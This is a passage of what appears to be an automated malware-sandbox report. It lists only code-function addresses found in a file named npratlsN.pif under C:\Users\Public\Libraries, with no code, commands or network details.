Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209CF6A8	13_2_209CF6A8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209CC6D0	13_2_209CC6D0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209CFAF0	13_2_209CFAF0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209CC6E0	13_2_209CC6E0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209CBE30	13_2_209CBE30
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209C0E2D	13_2_209C0E2D
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209CBE2A	13_2_209CBE2A
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209CF250	13_2_209CF250
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209CF240	13_2_209CF240
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209CC27A	13_2_209CC27A
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209CCF80	13_2_209CCF80
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209CD3DA	13_2_209CD3DA
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209CD3E8	13_2_209CD3E8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209CFB00	13_2_209CFB00
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209CCB38	13_2_209CCB38
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209C072A	13_2_209C072A
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209CCB2A	13_2_209CCB2A
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209D7AF0	13_2_209D7AF0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209D6C18	13_2_209D6C18
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209DE7B0	13_2_209DE7B0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209D65C0	13_2_209D65C0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209D0D48	13_2_209D0D48
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209D1E9E	13_2_209D1E9E
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209D0498	13_2_209D0498
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209DDE90	13_2_209DDE90
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209DBE8F	13_2_209DBE8F
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209D9288	13_2_209D9288
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209D0488	13_2_209D0488
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209D9280	13_2_209D9280
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209DF0BF	13_2_209DF0BF
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209D58B8	13_2_209D58B8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209D34B0	13_2_209D34B0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209D9EB0	13_2_209D9EB0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209D9EAD	13_2_209D9EAD
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209D58A8	13_2_209D58A8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209D1EA8	13_2_209D1EA8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209DBEA0	13_2_209DBEA0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209DB0DF	13_2_209DB0DF
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209D4ED0	13_2_209D4ED0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209DF0D0	13_2_209DF0D0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209DD0CF	13_2_209DD0CF
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209D4EC0	13_2_209D4EC0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209D34C0	13_2_209D34C0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209DB0F0	13_2_209DB0F0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209D08F0	13_2_209D08F0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209D7AED	13_2_209D7AED
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209DD0E0	13_2_209DD0E0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209D08E0	13_2_209D08E0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209DBA10	13_2_209DBA10
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209D4612	13_2_209D4612
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209DBA0D	13_2_209DBA0D
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209D0006	13_2_209D0006
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209DDA00	13_2_209DDA00
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209DEC35	13_2_209DEC35
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209D4620	13_2_209D4620
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209D8020	13_2_209D8020
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209D5458	13_2_209D5458
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209D305A	13_2_209D305A
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209D1A50	13_2_209D1A50
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209DCC50	13_2_209DCC50
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209DAC50	13_2_209DAC50
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209DCC4D	13_2_209DCC4D
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209DEC40	13_2_209DEC40
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209D0040	13_2_209D0040
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209D1A43	13_2_209D1A43
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209DDE7F	13_2_209DDE7F
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209D4A78	13_2_209D4A78
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209D4A72	13_2_209D4A72
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209D3068	13_2_209D3068
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209DAC60	13_2_209DAC60
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209D5460	13_2_209D5460
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209D1190	13_2_209D1190
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209DB580	13_2_209DB580
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209D41B8	13_2_209D41B8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209D65B0	13_2_209D65B0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209DC7B3	13_2_209DC7B3
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209D11A0	13_2_209D11A0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209DE7A3	13_2_209DE7A3
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209DA7D0	13_2_209DA7D0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209D41C8	13_2_209D41C8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209DA7C4	13_2_209DA7C4
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209DC7C0	13_2_209DC7C0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209D15F8	13_2_209D15F8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209DD9F1	13_2_209DD9F1
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209DF9F0	13_2_209DF9F0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209D15E8	13_2_209D15E8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209DF9E3	13_2_209DF9E3
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209D3918	13_2_209D3918
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209D5D10	13_2_209D5D10
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209DE310	13_2_209DE310
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209D3908	13_2_209D3908
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209D5D01	13_2_209D5D01
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209D2300	13_2_209D2300
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209D0D38	13_2_209D0D38
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209DA338	13_2_209DA338
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209DC330	13_2_209DC330
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209DC321	13_2_209DC321
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209DE320	13_2_209DE320
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209D6158	13_2_209D6158
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209DF54F	13_2_209DF54F
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209DA340	13_2_209DA340
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209D3D70	13_2_209D3D70
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209DD570	13_2_209DD570
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209DB570	13_2_209DB570
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209D6168	13_2_209D6168
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209DF560	13_2_209DF560
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209DD560	13_2_209DD560
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_209D3D62	13_2_209D3D62
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A44FA8	13_2_20A44FA8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A44908	13_2_20A44908
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A4BDA0	13_2_20A4BDA0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A47AA1	13_2_20A47AA1
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A42DA3	13_2_20A42DA3
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A42DA8	13_2_20A42DA8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A4E8A8	13_2_20A4E8A8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A40DA8	13_2_20A40DA8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A4A5A9	13_2_20A4A5A9
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A44EB6	13_2_20A44EB6
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A47AB0	13_2_20A47AB0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A4D0B1	13_2_20A4D0B1
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A404BF	13_2_20A404BF
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A40DB8	13_2_20A40DB8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A4A5B8	13_2_20A4A5B8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A436B8	13_2_20A436B8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A4FBB8	13_2_20A4FBB8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A462BB	13_2_20A462BB
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A4AA80	13_2_20A4AA80
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A42488	13_2_20A42488
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A4D588	13_2_20A4D588
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A49289	13_2_20A49289
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A46790	13_2_20A46790
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A4BD91	13_2_20A4BD91
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A49298	13_2_20A49298
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A44E98	13_2_20A44E98
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A4E89B	13_2_20A4E89B
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A4CBE7	13_2_20A4CBE7
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A4E3E0	13_2_20A4E3E0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A41FEC	13_2_20A41FEC
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A43FE8	13_2_20A43FE8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A475E8	13_2_20A475E8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A4A0E9	13_2_20A4A0E9
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A4F6F4	13_2_20A4F6F4
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A488F7	13_2_20A488F7
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A4A0F0	13_2_20A4A0F0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A448FC	13_2_20A448FC
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A45DFD	13_2_20A45DFD
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A41FF8	13_2_20A41FF8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A4CBF8	13_2_20A4CBF8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A4D0C0	13_2_20A4D0C0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A48DC0	13_2_20A48DC0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A4E3CF	13_2_20A4E3CF
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A436C8	13_2_20A436C8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A462C8	13_2_20A462C8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A4FBC8	13_2_20A4FBC8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A416C8	13_2_20A416C8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A4B8C8	13_2_20A4B8C8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A404D0	13_2_20A404D0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A48DD0	13_2_20A48DD0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A416D8	13_2_20A416D8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A4B8D8	13_2_20A4B8D8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A43FD8	13_2_20A43FD8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A475DB	13_2_20A475DB
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A40925	13_2_20A40925
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A43227	13_2_20A43227
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A47120	13_2_20A47120
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A4C720	13_2_20A4C720
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A4F22C	13_2_20A4F22C
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A40928	13_2_20A40928
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A49C28	13_2_20A49C28
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A45928	13_2_20A45928
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A41237	13_2_20A41237
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A4C730	13_2_20A4C730
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A48433	13_2_20A48433
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A43238	13_2_20A43238
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A45938	13_2_20A45938
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A4F238	13_2_20A4F238
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A4AF38	13_2_20A4AF38
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A45E00	13_2_20A45E00
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A4F700	13_2_20A4F700
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A4B400	13_2_20A4B400
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A4710F	13_2_20A4710F
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A48908	13_2_20A48908
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A42908	13_2_20A42908
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A4DF09	13_2_20A4DF09
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A4B410	13_2_20A4B410
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A4001C	13_2_20A4001C
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A42918	13_2_20A42918
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A4DF18	13_2_20A4DF18
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A49C18	13_2_20A49C18
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A45464	13_2_20A45464
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A44467	13_2_20A44467
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A49760	13_2_20A49760
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A4ED60	13_2_20A4ED60
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A4AA6F	13_2_20A4AA6F
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A41B68	13_2_20A41B68
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A4C268	13_2_20A4C268
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A47F68	13_2_20A47F68
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A45470	13_2_20A45470
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A4ED70	13_2_20A4ED70
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A4247C	13_2_20A4247C
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A4D57C	13_2_20A4D57C
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A4677F	13_2_20A4677F
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A44478	13_2_20A44478
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A47F78	13_2_20A47F78
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A4DA44	13_2_20A4DA44
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A40040	13_2_20A40040
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A48440	13_2_20A48440
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A41248	13_2_20A41248
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A4AF48	13_2_20A4AF48
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A43B48	13_2_20A43B48
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A46C48	13_2_20A46C48
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A49754	13_2_20A49754
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A4C257	13_2_20A4C257
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A4DA50	13_2_20A4DA50
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A43B58	13_2_20A43B58
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A46C58	13_2_20A46C58
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A41B58	13_2_20A41B58
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A7E810	13_2_20A7E810
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A709D0	13_2_20A709D0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A7EB30	13_2_20A7EB30
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A77150	13_2_20A77150
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A7DEB0	13_2_20A7DEB0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A77AB0	13_2_20A77AB0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A7ACB0	13_2_20A7ACB0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A7F490	13_2_20A7F490
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A79090	13_2_20A79090
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A7C290	13_2_20A7C290
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A780F0	13_2_20A780F0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A7E4F0	13_2_20A7E4F0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A7B2F0	13_2_20A7B2F0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A704FB	13_2_20A704FB
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A7FAC8	13_2_20A7FAC8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A7FAD0	13_2_20A7FAD0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A7C8D0	13_2_20A7C8D0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A796D0	13_2_20A796D0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A7D230	13_2_20A7D230
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A7A030	13_2_20A7A030
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A7E808	13_2_20A7E808
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A70015	13_2_20A70015
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A78410	13_2_20A78410
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A7B610	13_2_20A7B610
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A77460	13_2_20A77460
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A7D870	13_2_20A7D870
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A77470	13_2_20A77470
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A7A670	13_2_20A7A670
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A70040	13_2_20A70040
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A7EE50	13_2_20A7EE50
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A7BC50	13_2_20A7BC50
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A78A50	13_2_20A78A50
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A7F7B0	13_2_20A7F7B0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A7C5B0	13_2_20A7C5B0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A793B0	13_2_20A793B0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A709BF	13_2_20A709BF
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A7DB90	13_2_20A7DB90
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A77790	13_2_20A77790
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A7A990	13_2_20A7A990
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A799F0	13_2_20A799F0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A7CBF0	13_2_20A7CBF0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A7E1D0	13_2_20A7E1D0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A77DD0	13_2_20A77DD0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A7AFD0	13_2_20A7AFD0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A78730	13_2_20A78730
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A7B930	13_2_20A7B930
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A70508	13_2_20A70508
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A79D10	13_2_20A79D10
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A7CF10	13_2_20A7CF10
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A7F170	13_2_20A7F170
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A78D70	13_2_20A78D70
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A7BF70	13_2_20A7BF70
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A7D550	13_2_20A7D550
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A7A350	13_2_20A7A350
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A86120	13_2_20A86120
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A8C770	13_2_20A8C770
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A8DEA8	13_2_20A8DEA8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A854A0	13_2_20A854A0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A822A0	13_2_20A822A0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A8FAB5	13_2_20A8FAB5
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A83880	13_2_20A83880
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A80680	13_2_20A80680
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A828E0	13_2_20A828E0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A85AE0	13_2_20A85AE0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A8F0F8	13_2_20A8F0F8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A83EC0	13_2_20A83EC0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A80CC0	13_2_20A80CC0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A8FAD8	13_2_20A8FAD8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A84820	13_2_20A84820
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A81620	13_2_20A81620
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A85E00	13_2_20A85E00
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A82C00	13_2_20A82C00
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A84E60	13_2_20A84E60
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_20A81C60	13_2_20A81C60
